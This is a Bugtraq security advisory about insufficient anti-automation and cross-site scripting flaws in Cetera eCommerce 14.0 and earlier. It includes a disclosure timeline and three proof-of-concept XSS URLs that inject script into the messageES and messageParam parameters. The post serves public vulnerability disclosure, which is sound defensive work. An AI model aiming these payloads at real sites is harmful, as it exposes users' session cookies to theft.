|
|
 |
| New User, Welcome! Login |
Vulnerabilities in Cetera eCommerce
| From: |
"MustLive" <mustlive websecurity com ua> |
| To: |
<bugtraq securityfocus com> |
| Cc: |
|
| Subject: |
Vulnerabilities in Cetera eCommerce |
| Date: |
Wed - Jul 28, 2010 10:22 AM |
Hello Bugtraq!
I want to warn you about security vulnerabilities in Cetera eCommerce. Which
I disclosed already in December 2009 (SecurityVulns ID: 10489).
-----------------------------
Advisory: Vulnerabilities in Cetera eCommerce
-----------------------------
URL: http://websecurity.com.ua/3640/
-----------------------------
Affected products: Cetera eCommerce 14.0 and previous versions.
-----------------------------
Timeline:
01.03.2009 - found vulnerabilities.
30.10.2009 - announced at my site.
31.10.2009 - informed developers.
23.12.2009 - disclosed at my site.
-----------------------------
Details:
These are Insufficient Anti-automation and Cross-Site Scripting
vulnerabilities.
Insufficient Anti-automation:
http://site/
http://site/account/
There is no protection against automated requests (captcha) in forms at
these pages.
XSS:
http://site/account/?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/index.php?messageES=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/index.php?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!